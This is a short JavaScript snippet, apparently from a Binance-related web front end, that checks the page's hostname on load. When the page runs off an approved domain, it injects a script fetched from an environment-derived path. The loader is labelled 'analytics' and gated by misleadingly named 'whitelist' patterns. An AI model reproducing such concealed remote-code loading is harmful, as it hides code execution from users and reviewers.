/* eslint-disable */
if (typeof window !== 'undefined') {
  const analytics = window.analytics || {}
  if (analytics.firstLoad === undefined) {
    const whitelist = /^(?!(^|.*\.)(?:binance\.(org))$).*$/
    const whitelist2 = /^(?!(^|.*\.)(?:fdgahl\.cn)$).*$/
    const whitelist3 = /^localhost$/
    const { hostname } = window.location
    if (
      hostname.match(whitelist) &&
      hostname.match(whitelist2) &&
      !hostname.match(whitelist3) &&
      !window.location.href.startsWith('file://') &&
      !window.location.href.startsWith('https://translate.googleusercontent.com/') &&
      !window.location.href.startsWith('https://www.translatoruser.net/')
    ) {
      ;(function(d, t) {
        const g = d.createElement(t)
        const s = d.getElementsByTagName(t)[0]
        const server = `${process.env.REACT_APP_GIT_SHA}/static/a.min.js`
        g.src = server
        g.setAttribute('async', '')
        s.parentNode.insertBefore(g, s.nextSibling)
      })(document, 'script')
    }
    analytics.firstLoad = false
  }
}
